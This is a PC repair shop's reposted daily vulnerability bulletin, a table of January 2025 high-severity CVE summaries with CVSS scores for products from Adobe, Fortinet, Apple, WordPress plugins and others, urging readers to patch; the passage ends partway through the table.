PC Repair Service Centre
Computer Repair Center would post the daily security alert below. Please check if your server, web server, email server and PC have below Vulnerabilities and fix it as soon as possible. You may also contact our IT expertises at 9145-7188.
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info |
|---|---|---|---|---|
| 1000 Projects--Campaign Management System Platform for Women |
A vulnerability was found in 1000 Projects Campaign Management System Platform for Women 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /Code/sc_login.php. The manipulation of the argument uname leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-01-17 | 7.3 | CVE-2025-0533 |
| 1000 Projects--Campaign Management System Platform for Women |
A vulnerability was found in 1000 Projects Campaign Management System Platform for Women 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /Code/loginnew.php. The manipulation of the argument Username leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-01-17 | 7.3 | CVE-2025-0534 |
| adobe -- illustrator |
Illustrator on iPad versions 3.0.7 and earlier are affected by an Integer Underflow (Wrap or Wraparound) vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2025-01-14 | 7.8 | CVE-2025-21134 |
| adobe -- substance_3d_stager |
Substance3D - Stager versions 3.0.4 and earlier are affected by a Stack-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2025-01-14 | 7.8 | CVE-2025-21128 |
| adobe -- substance_3d_stager |
Substance3D - Stager versions 3.0.4 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2025-01-14 | 7.8 | CVE-2025-21129 |
| adobe -- substance_3d_stager |
Substance3D - Stager versions 3.0.4 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2025-01-14 | 7.8 | CVE-2025-21130 |
| adobe -- substance_3d_stager |
Substance3D - Stager versions 3.0.4 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2025-01-14 | 7.8 | CVE-2025-21131 |
| adobe -- substance_3d_stager |
Substance3D - Stager versions 3.0.4 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2025-01-14 | 7.8 | CVE-2025-21132 |
| Adobe--Animate |
Animate versions 24.0.6, 23.0.9 and earlier are affected by an Integer Underflow (Wrap or Wraparound) vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2025-01-14 | 7.8 | CVE-2025-21135 |
| Adobe--Illustrator on iPad |
Illustrator on iPad versions 3.0.7 and earlier are affected by an Integer Underflow (Wrap or Wraparound) vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2025-01-14 | 7.8 | CVE-2025-21133 |
| Adobe--Photoshop Desktop |
Photoshop Desktop versions 25.12, 26.1 and earlier are affected by an Integer Underflow (Wrap or Wraparound) vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2025-01-14 | 7.8 | CVE-2025-21122 |
| Adobe--Photoshop Desktop |
Photoshop Desktop versions 25.12, 26.1 and earlier are affected by an Uncontrolled Search Path Element vulnerability that could lead to arbitrary code execution. An attacker could manipulate the search path environment variable to point to a malicious library, resulting in the execution of arbitrary code when the application loads. Exploitation of this issue requires user interaction in that a victim must run the vulnerable application. | 2025-01-14 | 7.8 | CVE-2025-21127 |
| Adobe--Substance3D - Designer |
Substance3D - Designer versions 14.0 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2025-01-14 | 7.8 | CVE-2025-21136 |
| Adobe--Substance3D - Designer |
Substance3D - Designer versions 14.0 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2025-01-14 | 7.8 | CVE-2025-21137 |
| Adobe--Substance3D - Designer |
Substance3D - Designer versions 14.0 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2025-01-14 | 7.8 | CVE-2025-21138 |
| Adobe--Substance3D - Designer |
Substance3D - Designer versions 14.0 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2025-01-14 | 7.8 | CVE-2025-21139 |
| Adrian Moreno--WP Lyrics |
Cross-Site Request Forgery (CSRF) vulnerability in Adrian Moreno WP Lyrics allows Stored XSS.This issue affects WP Lyrics: from n/a through 0.4.1. | 2025-01-16 | 7.1 | CVE-2025-23533 |
| Albdesign--Simple Project Manager |
Cross-Site Request Forgery (CSRF) vulnerability in Albdesign Simple Project Manager allows Stored XSS.This issue affects Simple Project Manager: from n/a through 1.2.2. | 2025-01-16 | 7.1 | CVE-2025-23497 |
| Aleapp--WP Cookies Alert |
Cross-Site Request Forgery (CSRF) vulnerability in Aleapp WP Cookies Alert allows Cross Site Request Forgery.This issue affects WP Cookies Alert: from n/a through 1.1.1. | 2025-01-16 | 7.1 | CVE-2025-23821 |
| Alex Volkov--Chatter |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Alex Volkov Chatter allows Stored XSS. This issue affects Chatter: from n/a through 1.0.1. | 2025-01-16 | 7.1 | CVE-2025-23760 |
| Alexey Trofimov--Captchelfie Captcha by Selfie |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Alexey Trofimov Captchelfie - Captcha by Selfie allows Reflected XSS.This issue affects Captchelfie - Captcha by Selfie: from n/a through 1.0.7. | 2025-01-16 | 7.1 | CVE-2025-23620 |
| AlphaBPO--Easy Code Snippets |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in AlphaBPO Easy Code Snippets allows SQL Injection.This issue affects Easy Code Snippets: from n/a through 1.0.2. | 2025-01-16 | 7.6 | CVE-2025-23780 |
| AlTi5--AlT Report |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in AlTi5 AlT Report allows Reflected XSS.This issue affects AlT Report: from n/a through 1.12.0. | 2025-01-16 | 7.1 | CVE-2025-23432 |
| altimawebsystems.com--Altima Lookbook Free for WooCommerce |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in altimawebsystems.com Altima Lookbook Free for WooCommerce allows Reflected XSS.This issue affects Altima Lookbook Free for WooCommerce: from n/a through 1.1.0. | 2025-01-16 | 7.1 | CVE-2025-23429 |
| Amazon--WorkSpaces Client |
An issue in the native clients for Amazon WorkSpaces, Amazon AppStream 2.0, and Amazon DCV Clients may allow an attacker to access remote sessions via man-in-the-middle. | 2025-01-15 | 7.5 | CVE-2025-0500 |
| Amazon--WorkSpaces Client |
An issue in the native clients for Amazon WorkSpaces Clients when running PCoIP protocol may allow an attacker to access remote sessions via man-in-the-middle. | 2025-01-15 | 7.5 | CVE-2025-0501 |
| AMI--AptioV |
APTIOV contains a vulnerability in BIOS where an attacker may cause a TOCTOU Race Condition by local means. Successful exploitation of this vulnerability may lead to execution of arbitrary code on the target device. | 2025-01-14 | 7.5 | CVE-2024-42444 |
| Andrea Brandi--Twitter Shortcode |
Cross-Site Request Forgery (CSRF) vulnerability in Andrea Brandi Twitter Shortcode allows Stored XSS.This issue affects Twitter Shortcode: from n/a through 0.9. | 2025-01-16 | 7.1 | CVE-2025-23618 |
| Andy Chapman--ECT Add to Cart Button |
Cross-Site Request Forgery (CSRF) vulnerability in Andy Chapman ECT Add to Cart Button allows Stored XSS.This issue affects ECT Add to Cart Button: from n/a through 1.4. | 2025-01-16 | 7.1 | CVE-2025-23471 |
| anmari--amr personalise |
Cross-Site Request Forgery (CSRF) vulnerability in anmari amr personalise allows Cross Site Request Forgery.This issue affects amr personalise: from n/a through 2.10. | 2025-01-16 | 7.1 | CVE-2025-23880 |
| Anshul Sojatia--Scan External Links |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Anshul Sojatia Scan External Links allows Reflected XSS.This issue affects Scan External Links: from n/a through 1.0. | 2025-01-13 | 7.1 | CVE-2025-22583 |
| Apple--iOS and iPadOS |
This issue was addressed through improved state management. This issue is fixed in iOS 17.5 and iPadOS 17.5. An attacker with physical access to a device may be able to disable Stolen Device Protection. | 2025-01-15 | 9.1 | CVE-2024-44136 |
| Apple--macOS |
The issue was addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.5, iOS 16.7.8 and iPadOS 16.7.8, iOS 17.5 and iPadOS 17.5, macOS Monterey 12.7.5, watchOS 10.5, tvOS 17.5, macOS Ventura 13.6.7, visionOS 1.2. An app may be able to execute arbitrary code with kernel privileges. | 2025-01-15 | 8.4 | CVE-2024-40771 |
| Apple--tvOS |
The issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14.5, iOS 16.7.8 and iPadOS 16.7.8, Safari 17.5, iOS 17.5 and iPadOS 17.5, watchOS 10.5, tvOS 17.5, visionOS 1.2. Processing a file may lead to unexpected app termination or arbitrary code execution. | 2025-01-15 | 7.8 | CVE-2024-27856 |
| Arm--SCP-Firmware |
Specifically crafted SCMI messages sent to an SCP running SCP-Firmware release versions up to and including 2.15.0 may lead to a Usage Fault and crash the SCP | 2025-01-14 | 7.5 | CVE-2024-11864 |
| Artem Anikeev--Hack me if you can |
Cross-Site Request Forgery (CSRF) vulnerability in Artem Anikeev Hack me if you can allows Stored XSS.This issue affects Hack me if you can: from n/a through 1.2. | 2025-01-16 | 7.1 | CVE-2025-23713 |
| Artem Anikeev--Slider for Writers |
Cross-Site Request Forgery (CSRF) vulnerability in Artem Anikeev Slider for Writers allows Stored XSS.This issue affects Slider for Writers: from n/a through 1.3. | 2025-01-16 | 7.1 | CVE-2025-23692 |
| ArtkanMedia--Book a Place |
Cross-Site Request Forgery (CSRF) vulnerability in ArtkanMedia Book a Place allows Stored XSS.This issue affects Book a Place: from n/a through 0.7.1. | 2025-01-16 | 7.1 | CVE-2025-23690 |
| B&R Industrial Automation--Automation Runtime |
A "Use of a Broken or Risky Cryptographic Algorithm" vulnerability in the SSL/TLS component used in B&R Automation Runtime versions before 6.1 and B&R mapp View versions before 6.1 may be abused by unauthenticated network-based attackers to masquerade as services on impacted devices. | 2025-01-15 | 7.5 | CVE-2024-8603 |
| Bas Matthee--LSD Google Maps Embedder |
Cross-Site Request Forgery (CSRF) vulnerability in Bas Matthee LSD Google Maps Embedder allows Cross Site Request Forgery.This issue affects LSD Google Maps Embedder: from n/a through 1.1. | 2025-01-16 | 7.1 | CVE-2025-23871 |
| Belledonne Communications--Linphone-Desktop |
Belledonne Communications Linphone-Desktop is vulnerable to a NULL Dereference vulnerability, which could allow a remote attacker to create a denial-of-service condition. | 2025-01-17 | 7.5 | CVE-2025-0430 |
| Benjamin Guy--Style Admin |
Cross-Site Request Forgery (CSRF) vulnerability in Benjamin Guy Style Admin allows Stored XSS.This issue affects Style Admin: from n/a through 1.4.3. | 2025-01-16 | 7.1 | CVE-2025-23801 |
| Berkman Center for Internet & Society--Amber |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Berkman Center for Internet & Society Amber allows Reflected XSS.This issue affects Amber: from n/a through 1.4.4. | 2025-01-15 | 7.1 | CVE-2025-22754 |
| BlackBerry--QNX Software Development Platform (SDP) |
Out-of-bounds write in the PCX image codec in QNX SDP versions 8.0, 7.1 and 7.0 could allow an unauthenticated attacker to cause a denial-of-service condition or execute code in the context of the process using the image codec. | 2025-01-14 | 9.8 | CVE-2024-48856 |
| BlackBerry--QNX Software Development Platform (SDP) |
NULL pointer dereference in the PCX image codec in QNX SDP versions 8.0, 7.1 and 7.0 could allow an unauthenticated attacker to cause a denial-of-service condition in the context of the process using the image codec. | 2025-01-14 | 7.5 | CVE-2024-48857 |
| BlackBerry--QNX Software Development Platform (SDP) |
Improper input validation in the PCX image codec in QNX SDP versions 8.0, 7.1 and 7.0 could allow an unauthenticated attacker to cause a denial-of-service condition in the context of the process using the image codec. | 2025-01-14 | 7.5 | CVE-2024-48858 |
| Bold--Bold pagos en linea |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Bold Bold pagos en linea allows DOM-Based XSS.This issue affects Bold pagos en linea: from n/a through 3.1.0. | 2025-01-15 | 7.1 | CVE-2025-22793 |
| boldgrid -- w3_total_cache |
The W3 Total Cache plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the is_w3tc_admin_page function in all versions up to, and including, 2.8.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to obtain the plugin's nonce value and perform unauthorized actions, resulting in information disclosure, service plan limits consumption as well as making web requests to arbitrary locations originating from the web application that can be used to query information from internal services, including instance metadata on cloud-based applications. | 2025-01-14 | 8.5 | CVE-2024-12365 |
| Braulio Aquino Garca--Send to Twitter |
Cross-Site Request Forgery (CSRF) vulnerability in Braulio Aquino GarcÃa Send to Twitter allows Stored XSS.This issue affects Send to Twitter: from n/a through 1.7.2. | 2025-01-16 | 7.1 | CVE-2025-23691 |
| Brian Novotny Creative Software Design Solutions--Marquee Style RSS News Ticker |
Cross-Site Request Forgery (CSRF) vulnerability in Brian Novotny - Creative Software Design Solutions Marquee Style RSS News Ticker allows Cross Site Request Forgery.This issue affects Marquee Style RSS News Ticker: from n/a through 3.2.0. | 2025-01-16 | 7.1 | CVE-2025-23424 |
| C4.yberPower--PowerPanel Business |
A denial-of-service vulnerability exists in CyberPower PowerPanel Business (PPB) 4.11.0. An unauthenticated remote attacker can restart the ppbd.exe process via the PowerPanel Business Service Watchdog service listening on TCP port 2003. The attacker can repeatedly restart ppbd.exe to render it unavailable. | 2025-01-15 | 7.5 | CVE-2024-11322 |
| Capa--Wp-Scribd-List |
Cross-Site Request Forgery (CSRF) vulnerability in Capa Wp-Scribd-List allows Stored XSS.This issue affects Wp-Scribd-List: from n/a through 1.2. | 2025-01-16 | 7.1 | CVE-2025-23436 |
| Chris Roberts--Annie |
Cross-Site Request Forgery (CSRF) vulnerability in Chris Roberts Annie allows Cross Site Request Forgery.This issue affects Annie: from n/a through 2.1.1. | 2025-01-16 | 7.1 | CVE-2025-23884 |
| code-projects--Admission Management System |
A vulnerability classified as critical was found in code-projects Admission Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /signupconfirm.php. The manipulation of the argument in_eml leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Other parameters might be affected as well. | 2025-01-17 | 7.3 | CVE-2025-0527 |
| code-projects--Fantasy-Cricket |
A vulnerability was found in code-projects Fantasy-Cricket 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /authenticate.php. The manipulation of the argument uname leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-01-19 | 7.3 | CVE-2025-0564 |
| CodeBard--CodeBard Help Desk |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CodeBard CodeBard Help Desk allows Reflected XSS.This issue affects CodeBard Help Desk: from n/a through 1.1.2. | 2025-01-15 | 7.1 | CVE-2025-22760 |
| ComMotion--Course Booking System |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in ComMotion Course Booking System allows SQL Injection.This issue affects Course Booking System: from n/a through 6.0.5. | 2025-01-15 | 9.3 | CVE-2025-22785 |
| Convoy--Media Category Library |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Convoy Media Category Library allows Reflected XSS.This issue affects Media Category Library: from n/a through 2.7. | 2025-01-13 | 7.1 | CVE-2025-22344 |
| Cornea Alexandru--Category Custom Fields |
Cross-Site Request Forgery (CSRF) vulnerability in Cornea Alexandru Category Custom Fields allows Cross Site Request Forgery.This issue affects Category Custom Fields: from n/a through 1.0. | 2025-01-16 | 7.1 | CVE-2025-23822 |
| craftcms--cms |
Craft is a flexible, user-friendly CMS for creating custom digital experiences on the web and beyond. This is an remote code execution (RCE) vulnerability that affects Craft 4 and 5 installs where your security key has already been compromised. Anyone running an unpatched version of Craft with a compromised security key is affected. This vulnerability has been patched in Craft 5.5.8 and 4.13.8. Users who cannot update to a patched version, should rotate their security keys and ensure their privacy to help migitgate the issue. | 2025-01-18 | 8 | CVE-2025-23209 |
| CS : ABS-Hosting.nl / Walchum.net--Free MailClient FMC |
Cross-Site Request Forgery (CSRF) vulnerability in CS : ABS-Hosting.nl / Walchum.net Free MailClient FMC allows Stored XSS.This issue affects Free MailClient FMC: from n/a through 1.0. | 2025-01-16 | 7.1 | CVE-2025-23703 |
| D-Link--DIR-823X |
A vulnerability has been found in D-Link DIR-823X 240126/240802 and classified as critical. Affected by this vulnerability is the function FUN_00412244. The manipulation leads to null pointer dereference. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-01-15 | 7.5 | CVE-2025-0492 |
| Dan Cameron--Add RSS |
Cross-Site Request Forgery (CSRF) vulnerability in Dan Cameron Add RSS allows Stored XSS.This issue affects Add RSS: from n/a through 1.5. | 2025-01-16 | 7.1 | CVE-2025-23895 |
| Daniel Powney--Hotspots Analytics |
Cross-Site Request Forgery (CSRF) vulnerability in Daniel Powney Hotspots Analytics allows Stored XSS.This issue affects Hotspots Analytics: from n/a through 4.0.12. | 2025-01-16 | 7.1 | CVE-2025-23848 |
| Dave Konopka, Martin Scharm--UpDownUpDown |
Cross-Site Request Forgery (CSRF) vulnerability in Dave Konopka, Martin Scharm UpDownUpDown allows Stored XSS.This issue affects UpDownUpDown: from n/a through 1.1. | 2025-01-16 | 7.1 | CVE-2025-23572 |
| David Hamilton--OrangeBox |
Cross-Site Request Forgery (CSRF) vulnerability in David Hamilton OrangeBox allows Cross Site Request Forgery.This issue affects OrangeBox: from n/a through 3.0.0. | 2025-01-16 | 7.1 | CVE-2025-23800 |
| David Marcucci--Password Protect Plugin for WordPress |
Cross-Site Request Forgery (CSRF) vulnerability in David Marcucci Password Protect Plugin for WordPress allows Stored XSS.This issue affects Password Protect Plugin for WordPress: from n/a through 0.8.1.0. | 2025-01-16 | 7.1 | CVE-2025-23435 |
| Detlef Stver--WPEX Replace DB Urls |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Detlef Stöver WPEX Replace DB Urls allows Reflected XSS.This issue affects WPEX Replace DB Urls: from n/a through 0.4.0. | 2025-01-13 | 7.1 | CVE-2025-22586 |
| digfish--Geotagged Media |
Cross-Site Request Forgery (CSRF) vulnerability in digfish Geotagged Media allows Stored XSS.This issue affects Geotagged Media: from n/a through 0.3.0. | 2025-01-16 | 7.1 | CVE-2025-23558 |
| discourse--discourse-ai |
Discourse AI is a Discourse plugin which provides a number of AI features. When sharing Discourse AI Bot conversations into posts, if the conversation had HTML entities those could leak into the Discourse application when a user visited a post with a onebox to said conversation. This issue has been addressed in commit `92f122c`. Users are advised to update. Users unable to update may remove all groups from `ai bot public sharing allowed groups` site setting. | 2025-01-14 | 9 | CVE-2024-54142 |
| Dominic Fallows--DF Draggable |
Cross-Site Request Forgery (CSRF) vulnerability in Dominic Fallows DF Draggable allows Stored XSS.This issue affects DF Draggable: from n/a through 1.13.2. | 2025-01-16 | 7.1 | CVE-2025-23708 |
| Don Kukral--Email on Publish |
Cross-Site Request Forgery (CSRF) vulnerability in Don Kukral Email on Publish allows Stored XSS.This issue affects Email on Publish: from n/a through 1.5. | 2025-01-16 | 7.1 | CVE-2025-23673 |
| DSmidgy--HTTP to HTTPS link changer by Eyga.net |
Cross-Site Request Forgery (CSRF) vulnerability in DSmidgy HTTP to HTTPS link changer by Eyga.net allows Stored XSS.This issue affects HTTP to HTTPS link changer by Eyga.net: from n/a through 0.2.4. | 2025-01-16 | 7.1 | CVE-2025-23677 |
| dueclic--turboSMTP |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in dueclic turboSMTP allows Reflected XSS.This issue affects turboSMTP: from n/a through 4.6. | 2025-01-15 | 7.1 | CVE-2025-22753 |
| EdesaC--Extra Options Favicons |
Cross-Site Request Forgery (CSRF) vulnerability in EdesaC Extra Options - Favicons allows Stored XSS.This issue affects Extra Options - Favicons: from n/a through 1.1.0. | 2025-01-16 | 7.1 | CVE-2025-23508 |
| EditionGuard Dev Team--EditionGuard for WooCommerce eBook Sales with DRM |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in EditionGuard Dev Team EditionGuard for WooCommerce - eBook Sales with DRM allows Reflected XSS.This issue affects EditionGuard for WooCommerce - eBook Sales with DRM: from n/a through 3.4.2. | 2025-01-16 | 7.1 | CVE-2025-23452 |
| ElementInvader--ElementInvader Addons for Elementor |
Path Traversal vulnerability in ElementInvader ElementInvader Addons for Elementor allows PHP Local File Inclusion.This issue affects ElementInvader Addons for Elementor: from n/a through 1.2.6. | 2025-01-15 | 7.5 | CVE-2025-22786 |
| Elke Hinze, Plumeria Web Design--Web Testimonials |
Cross-Site Request Forgery (CSRF) vulnerability in Elke Hinze, Plumeria Web Design Web Testimonials allows Stored XSS.This issue affects Web Testimonials: from n/a through 1.2. | 2025-01-16 | 7.1 | CVE-2025-23560 |
| Eniture Technology--Distance Based Shipping Calculator |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Eniture Technology Distance Based Shipping Calculator allows Reflected XSS.This issue affects Distance Based Shipping Calculator: from n/a through 2.0.21. | 2025-01-13 | 7.1 | CVE-2024-56301 |
| ETIC Telecom--Remote Access Server (RAS) |
All versions of ETIC Telecom Remote Access Server (RAS) prior to 4.9.19 are vulnerable to cross-site request forgery (CSRF). An external attacker with no access to the device can force the end user into submitting a "setconf" method request, not requiring any CSRF token, which can lead into denial of service on the device. | 2025-01-17 | 7.4 | CVE-2024-26153 |
| EveHome--Eve Play |
An attacker could exploit the 'Use of Password Hash With Insufficient Computational Effort' vulnerability in EveHome Eve Play to execute arbitrary code. This issue affects Eve Play: through 1.1.42. | 2025-01-13 | 9.8 | CVE-2024-5743 |
| FAKTOR VIER--F4 Post Tree |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in FAKTOR VIER F4 Post Tree allows Reflected XSS.This issue affects F4 Post Tree: from n/a through 1.1.18. | 2025-01-13 | 7.1 | CVE-2025-22499 |
| Fanli2012--native-php-cms |
A vulnerability, which was classified as critical, was found in Fanli2012 native-php-cms 1.0. This affects an unknown part of the file /fladmin/user_recoverpwd.php. The manipulation leads to use of default credentials. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | 2025-01-15 | 7.3 | CVE-2025-0482 |
| Fanli2012--native-php-cms |
A vulnerability was found in Fanli2012 native-php-cms 1.0 and classified as critical. This issue affects some unknown processing of the file /fladmin/sysconfig_doedit.php of the component Backend. The manipulation leads to improper authorization. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2025-01-15 | 7.3 | CVE-2025-0484 |
| Fanli2012--native-php-cms |
A vulnerability was found in Fanli2012 native-php-cms 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /fladmin/login.php. The manipulation of the argument username leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-01-15 | 7.3 | CVE-2025-0486 |
| fortinet -- fortiproxy |
An Authentication Bypass Using an Alternate Path or Channel vulnerability [CWE-288] affecting FortiOS version 7.0.0 through 7.0.16 and FortiProxy version 7.0.0 through 7.0.19 and 7.2.0 through 7.2.12 allows a remote attacker to gain super-admin privileges via crafted requests to Node.js websocket module. | 2025-01-14 | 9.8 | CVE-2024-55591 |
| Fortinet--FortiAnalyzer |
A out-of-bounds write in Fortinet FortiManager version 7.4.0 through 7.4.2, FortiAnalyzer version 7.4.0 through 7.4.2 allows attacker to escalation of privilege via specially crafted http requests. | 2025-01-14 | 7.2 | CVE-2024-35273 |
| Fortinet--FortiAnalyzer |
A incorrect privilege assignment in Fortinet FortiAnalyzer versions 7.4.0 through 7.4.3, 7.2.0 through 7.2.5, 7.0.0 through 7.0.13, 6.4.0 through 6.4.15, FortiManager versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.5, 7.0.0 through 7.0.13, 6.4.0 through 6.4.15, FortiAnalyzer Cloud versions 7.4.1 through 7.4.2, 7.2.1 through 7.2.6, 7.0.1 through 7.0.13, 6.4.1 through 6.4.7 allows attacker to escalate privilege via specific shell commands | 2025-01-16 | 7.3 | CVE-2024-45331 |
| Fortinet--FortiAnalyzer |
A weak authentication in Fortinet FortiManager Cloud, FortiAnalyzer versions 7.6.0 through 7.6.1, 7.4.1 through 7.4.3, FortiAnalyzer Cloud versions 7.4.1 through 7.4.3, FortiManager versions 7.6.0 through 7.6.1, 7.4.1 through 7.4.3, FortiManager Cloud versions 7.4.1 through 7.4.3 allows attacker to execute unauthorized code or commands via a brute-force attack. | 2025-01-16 | 7.3 | CVE-2024-50563 |
| Fortinet--FortiClientEMS |
An improper restriction of excessive authentication attempts [CWE-307] in FortiClientEMS version 7.2.0 through 7.2.4 and before 7.0.10 allows an unauthenticated attacker to try a brute force attack against the FortiClientEMS console via crafted HTTP or HTTPS requests. | 2025-01-14 | 8.1 | CVE-2024-23106 |
| Fortinet--FortiManager |
A missing authentication for critical function in Fortinet FortiPortal version 6.0.0 through 6.0.15, FortiManager version 7.4.0 through 7.4.2, 7.2.0 through 7.2.5, 7.0.0 through 7.0.12, 6.4.0 through 6.4.14 allows attacker to access to the configuration of the managed devices by sending specifically crafted packets | 2025-01-14 | 8.6 | CVE-2024-35277 |
| Fortinet--FortiManager |
An operation on a resource after expiration or release in Fortinet FortiManager 6.4.12 through 7.4.0 allows an attacker to gain improper access to FortiGate via valid credentials. | 2025-01-14 | 8.1 | CVE-2024-47571 |
| Fortinet--FortiManager |
An improper limitation of a pathname to a restricted directory ('path traversal') in Fortinet FortiManager, FortiAnalyzer 7.4.0 through 7.4.3 and 7.2.0 through 7.2.5 and 7.0.2 through 7.0.12 and 6.2.10 through 6.2.13 allows attacker to execute unauthorized code or commands via crafted HTTP or HTTPS requests. | 2025-01-14 | 7.2 | CVE-2024-36512 |
| Fortinet--FortiManager |
A improper limitation of a pathname to a restricted directory ('path traversal') in Fortinet FortiManager versions 7.6.0 through 7.6.1, 7.4.1 through 7.4.3, FortiOS versions 7.6.0, 7.4.0 through 7.4.4, 7.2.5 through 7.2.9, 7.0.0 through 7.0.15, 6.4.0 through 6.4.15, FortiProxy 7.4.0 through 7.4.5, 7.2.0 through 7.2.11, 7.0.0 through 7.0.18, 2.0.0 through 2.0.14, 1.2.0 through 1.2.13, 1.1.0 through 1.1.6, 1.0.0 through 1.0.7, FortiManager Cloud versions 7.4.1 through 7.4.3 allows attacker to trigger an escalation of privilege via specially crafted packets. | 2025-01-14 | 7.5 | CVE-2024-48884 |
| Fortinet--FortiManager |
A improper neutralization of special elements used in an os command ('os command injection') in Fortinet FortiManager versions 7.6.0 through 7.6.1, versions 7.4.5 through 7.4.0, and versions 7.2.1 through 7.2.8, FortiManager Cloud versions 7.6.0 through 7.6.1, versions 7.4.0 through 7.4.4, and versions 7.2.2 through 7.2.7 may allow an authenticated remote attacker to execute unauthorized code via FGFM crafted requests. | 2025-01-14 | 7.2 | CVE-2024-50566 |
| Fortinet--FortiOS |
A weak authentication in Fortinet FortiOS versions 7.4.0 through 7.4.4, 7.2.0 through 7.2.8, 7.0.0 through 7.0.15, 6.4.0 through 6.4.15, FortiProxy versions 7.4.0 through 7.4.4, 7.2.0 through 7.2.10, 7.0.0 through 7.0.17, 2.0.0 through 2.0.14, FortiManager versions 7.6.0 through 7.6.1, 7.4.1 through 7.4.3, FortiManager Cloud versions 7.4.1 through 7.4.3, FortiAnalyzer Cloud versions 7.4.1 through 7.4.3 allows attacker to execute unauthorized code or commands via a brute-force attack. | 2025-01-14 | 9 | CVE-2024-48886 |
| Fortinet--FortiOS |
An allocation of resources without limits or throttling vulnerability [CWE-770] in FortiOS versions 7.4.0 through 7.4.4, versions 7.2.0 through 7.2.8, versions 7.0.0 through 7.0.15, and versions 6.4.0 through 6.4.15 may allow an unauthenticated remote user to consume all system memory via multiple large file uploads. | 2025-01-14 | 7.5 | CVE-2024-46668 |
| Fortinet--FortiOS |
An Out-of-bounds Read vulnerability [CWE-125] in FortiOS version 7.6.0, version 7.4.4 and below, version 7.2.9 and below and FortiSASE FortiOS tenant version 24.3.b IPsec IKE service may allow an unauthenticated remote attacker to trigger memory consumption leading to Denial of Service via crafted requests. | 2025-01-14 | 7.5 | CVE-2024-46670 |
| Fortinet--FortiSandbox |
An improper neutralization of special elements used in an OS Command vulnerability [CWE-78] in Fortinet FortiSandbox version 4.4.0 through 4.4.4, 4.2.0 through 4.2.6 and below 4.0.4 allows an authenticated attacker with at least read-only permission to execute unauthorized commands via crafted requests. | 2025-01-14 | 8.8 | CVE-2024-27778 |
| Fortinet--FortiSIEM |
A allocation of resources without limits or throttling in Fortinet FortiSIEM 5.3 all versions, 5.4 all versions, 6.x all versions, 7.0 all versions, and 7.1.0 through 7.1.5 may allow an attacker to deny valid TLS traffic via consuming all allotted connections. | 2025-01-14 | 7.5 | CVE-2024-46667 |
| Fortinet--FortiSOAR |
An improper neutralization of formula elements in a csv file in Fortinet FortiSOAR 7.2.1 through 7.4.1 allows attacker to execute unauthorized code or commands via manipulating csv file | 2025-01-14 | 9 | CVE-2024-47572 |
| Fortinet--FortiSwitch |
